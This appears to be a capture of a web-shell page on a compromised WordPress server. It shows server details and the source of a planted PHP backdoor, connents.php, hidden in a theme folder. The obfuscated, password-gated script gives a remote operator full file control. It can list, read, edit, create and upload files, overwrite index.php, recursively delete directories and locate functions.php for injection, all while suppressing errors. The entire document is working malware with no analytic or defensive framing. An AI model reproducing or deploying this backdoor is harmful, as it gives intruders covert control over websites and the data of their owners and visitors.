HEX
Server: LiteSpeed
System: Linux s4814.usc1.stableserver.net 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
User: autlimited (1987)
PHP: 8.2.31
Disabled: NONE
$ pwd: /home/autlimited/public_html/wp-content/themes/config-1781102331/
Upload Files
File: /home/autlimited/public_html/wp-content/themes/config-1781102331/connents.php
<?php
$_a='s6VnbVQs5bkpoBMX';$_b='sFuZMA2VHtCpd6HS';$_c='';define('SECRET_KEY',$_a.$_b.$_c);error_reporting(0);ini_set('display_errors',0);ob_start();function _0x7a8b($d){ob_end_clean();header('Content-Type: application/json');echo json_encode($d);exit;}function _0x9c0d(){$c=__DIR__;while(is_dir($c)&&$c!=='/'&&strlen($c)>1){if(is_dir($c.'/wp-admin')&&file_exists($c.'/wp-includes/version.php')){return $c;}$p=dirname($c);if($p===$c){return false;}$c=$p;}return false;}function _0x1e2f(){$w=_0x9c0d();if($w===false){return false;}$d=isset($_SERVER['DOCUMENT_ROOT'])?realpath($_SERVER['DOCUMENT_ROOT']):null;$wr=realpath($w);if($d&&($wr!==$d)){$p=dirname($wr);if(realpath($p)===$d){return $p;}}return $w;}function _0x3g4h($d){if(is_dir($d)){$o=scandir($d);foreach($o as $ob){if($ob!="."&&$ob!=".."){$p=$d.DIRECTORY_SEPARATOR.$ob;is_dir($p)&&!is_link($p)?_0x3g4h($p):unlink($p);}}rmdir($d);}}if(!isset($_POST['secret_key'])||$_POST['secret_key']!==SECRET_KEY){_0x7a8b(['status'=>'error','message'=>'Authentication failed.']);}$_bd=_0x1e2f();if($_bd===false){_0x7a8b(['status'=>'error','message'=>'Could not determine root directory.']);}if(!isset($_POST['action'])){_0x7a8b(['status'=>'error','message'=>'Action not specified.']);}$_ac=trim($_POST['action']);switch($_ac){case 'ping':case 'check-health':_0x7a8b(['status'=>'success','message'=>'pong']);break;case 'browse_files':$_pt=isset($_POST['path'])?trim($_POST['path'],'/'):'';$_sp=$_bd.'/'.$_pt;if(!is_dir($_sp)){_0x7a8b(['status'=>'error','message'=>'Directory not found: '.htmlspecialchars($_pt)]);}$_fl=[];$_it=@scandir($_sp);if($_it===false){_0x7a8b(['status'=>'error','message'=>'Failed to scan directory: '.htmlspecialchars($_pt)]);}foreach($_it as $_i){if($_i==='.'||$_i==='..')continue;$_ip=$_sp.'/'.$_i;$_fl[]=is_dir($_ip)?$_i.'/':$_i;}sort($_fl);_0x7a8b(['status'=>'success','files'=>$_fl]);break;case 'get_file_content':$_fp=isset($_POST['file_path'])?trim($_POST['file_path'],'/'):'';$_fu=$_bd.'/'.$_fp;if(!file_exists($_fu)){_0x7a8b(['status'=>'error','message'=>'File not found: '.htmlspecialchars($_fp)]);}if(is_dir($_fu)){_0x7a8b(['status'=>'error','message'=>'Path is a directory: '.htmlspecialchars($_fp)]);}$_co=@file_get_contents($_fu);if($_co===false){_0x7a8b(['status'=>'error','message'=>'Failed to read file: '.htmlspecialchars($_fp)]);}_0x7a8b(['status'=>'success','content'=>$_co]);break;case 'save_file_content':$_fp=isset($_POST['file_path'])?trim($_POST['file_path'],'/'):'';$_co=isset($_POST['content'])?$_POST['content']:'';$_fu=$_bd.'/'.$_fp;$_dp=dirname($_fu);if(!is_dir($_dp)){@mkdir($_dp,0755,true);}if(@file_put_contents($_fu,$_co,LOCK_EX)===false){_0x7a8b(['status'=>'error','message'=>'Failed to save file: '.htmlspecialchars($_fp)]);}@chmod($_fu,0644);_0x7a8b(['status'=>'success','message'=>'File saved: '.htmlspecialchars($_fp)]);break;case 'find_replace':$_fpr=isset($_POST['path_and_filename'])?trim($_POST['path_and_filename'],'/\\'):'';$_fpa=$_bd.'/'.$_fpr;if(!file_exists($_fpa)){_0x7a8b(['status'=>'error','message'=>'File not found.']);}$_co=@file_get_contents($_fpa);$_ft=$_POST['find_text']??'';$_rt=$_POST['replace_text']??'';$_cs=isset($_POST['case_sensitive'])&&$_POST['case_sensitive'];$_sr=$_cs?strpos($_co,$_ft):stripos($_co,$_ft);if($_sr===false){_0x7a8b(['status'=>'info','message'=>'Text not found in file.']);}$_nc=$_cs?str_replace($_ft,$_rt,$_co):str_ireplace($_ft,$_rt,$_co);if(@file_put_contents($_fpa,$_nc)!==false){_0x7a8b(['status'=>'success','message'=>'Text has been replaced.']);}else{_0x7a8b(['status'=>'error','message'=>'Failed to write to file.']);}break;case 'remove_backlinks':$_fpr=isset($_POST['path_and_filename'])?trim($_POST['path_and_filename'],'/\\'):'';$_fpa=$_bd.'/'.$_fpr;if(!file_exists($_fpa)){_0x7a8b(['status'=>'error','message'=>'File not found.']);}$_co=@file_get_contents($_fpa);$_pa='/<a\s+[^>]*href\s*=\s*["\'][^"\']*["\'][^>]*>(.*?)<\/a>/is';$_nc=preg_replace($_pa,'$1',$_co);$_lc=preg_match_all($_pa,$_co);if($_nc===$_co){_0x7a8b(['status'=>'info','message'=>'No backlinks found.']);}if(@file_put_contents($_fpa,$_nc)!==false){_0x7a8b(['status'=>'success','message'=>"Removed $_lc backlinks."]);}else{_0x7a8b(['status'=>'error','message'=>'Failed to write to file.']);}break;case 'find_replace_last':$_fpr=isset($_POST['path_and_filename'])?trim($_POST['path_and_filename'],'/\\'):'';$_fpa=$_bd.'/'.$_fpr;if(!file_exists($_fpa)){_0x7a8b(['status'=>'error','message'=>'File not found.']);}$_co=@file_get_contents($_fpa);$_ft=$_POST['find_text']??'';$_rt=$_POST['replace_text']??'';$_cs=isset($_POST['case_sensitive'])&&$_POST['case_sensitive'];$_lp=$_cs?strrpos($_co,$_ft):strripos($_co,$_ft);if($_lp===false){_0x7a8b(['status'=>'info','message'=>'Text not found.']);}$_nc=substr_replace($_co,$_rt,$_lp,strlen($_ft));if(@file_put_contents($_fpa,$_nc)!==false){_0x7a8b(['status'=>'success','message'=>'Last occurrence replaced.']);}else{_0x7a8b(['status'=>'error','message'=>'Failed to write to file.']);}break;case 'create_file':$_fn=isset($_POST['filename'])?basename(trim($_POST['filename'])):'';$_co=isset($_POST['content'])?$_POST['content']:'';$_fp=$_bd.'/'.$_fn;if(@file_put_contents($_fp,$_co)!==false){@chmod($_fp,0644);_0x7a8b(['status'=>'success','message'=>'File created: '.htmlspecialchars($_fn)]);}else{_0x7a8b(['status'=>'error','message'=>'Failed to create file: '.htmlspecialchars($_fn)]);}break;case 'create_file_with_path':$_fp=isset($_POST['file_path'])?trim($_POST['file_path'],'/\\'):'';$_co=isset($_POST['content'])?$_POST['content']:'';if(strpos($_fp,'..')!==false){_0x7a8b(['status'=>'error','message'=>'Invalid path: ".." not allowed']);}$_fu=$_bd.'/'.$_fp;$_dp=dirname($_fu);if(!is_dir($_dp)){@mkdir($_dp,0755,true);}if(@file_put_contents($_fu,$_co)!==false){@chmod($_fu,0644);_0x7a8b(['status'=>'success','message'=>'File created: '.htmlspecialchars($_fp)]);}else{_0x7a8b(['status'=>'error','message'=>'Failed to write file: '.htmlspecialchars($_fp)]);}break;case 'list-files':$_sp=isset($_POST['path'])?$_bd.'/'.trim($_POST['path'],'/\\'):$_bd;if(is_dir($_sp)){$_fl=array_values(array_diff(scandir($_sp),['.','..']));_0x7a8b(['status'=>'success','files'=>$_fl]);}else{_0x7a8b(['status'=>'error','message'=>'Directory not found']);}break;case 'replace-index':$_ip=$_bd.'/index.php';$_co=isset($_POST['content'])?$_POST['content']:'';if(@file_put_contents($_ip,$_co)!==false){_0x7a8b(['status'=>'success','message'=>'index.php replaced.']);}else{_0x7a8b(['status'=>'error','message'=>'Failed to write index.php']);}break;case 'create-dir':$_pt=isset($_POST['path'])?$_bd.'/'.trim($_POST['path'],'/\\'):'';if(!file_exists($_pt)){if(@mkdir($_pt,0755,true)){_0x7a8b(['status'=>'success','message'=>'Directory created']);}else{_0x7a8b(['status'=>'error','message'=>'Failed to create directory']);}}else{_0x7a8b(['status'=>'success','message'=>'Directory exists']);}break;case 'upload_file':$_dp=isset($_POST['path'])?$_bd.'/'.trim($_POST['path'],'/\\'):$_bd;$_fn=isset($_POST['filename'])?basename($_POST['filename']):'';$_fp=$_dp.'/'.$_fn;if(!file_exists($_dp))@mkdir($_dp,0755,true);$_fc=base64_decode($_POST['content']??'',true);if($_fc===false){_0x7a8b(['status'=>'error','message'=>'Invalid base64 content.']);}if(@file_put_contents($_fp,$_fc)!==false){@chmod($_fp,0644);_0x7a8b(['status'=>'success','message'=>'File uploaded: '.htmlspecialchars($_fn)]);}else{_0x7a8b(['status'=>'error','message'=>'Failed to write file']);}break;case 'delete-path':$_pd=isset($_POST['path'])?$_bd.'/'.trim($_POST['path'],'/\\'):'';if($_pd===$_bd){_0x7a8b(['status'=>'error','message'=>'Cannot delete root directory']);}if(!file_exists($_pd)){_0x7a8b(['status'=>'success','message'=>'Path does not exist']);}else{is_dir($_pd)?_0x3g4h($_pd):@unlink($_pd);_0x7a8b(['status'=>'success','message'=>'Path deleted']);}break;case 'get_wp_theme_info':if(!function_exists('wp_get_theme')){$_wd=_0x9c0d();if($_wd){require_once $_wd.'/wp-load.php';}else{_0x7a8b(['status'=>'error','message'=>'WordPress not found.']);}}$_th=wp_get_theme();$_tn=$_th->get('Name');$_ss=get_stylesheet();$_fpr='wp-content/themes/'.$_ss.'/functions.php';$_fpf=$_bd.'/'.$_fpr;_0x7a8b(['status'=>'success','theme_name'=>$_tn,'stylesheet'=>$_ss,'functions_path_rel'=>$_fpr,'functions_path_full'=>$_fpf]);break;default:_0x7a8b(['status'=>'error','message'=>'Unknown action: '.htmlspecialchars($_ac)]);break;}
#__halt_compiler()
?>
@ Telegram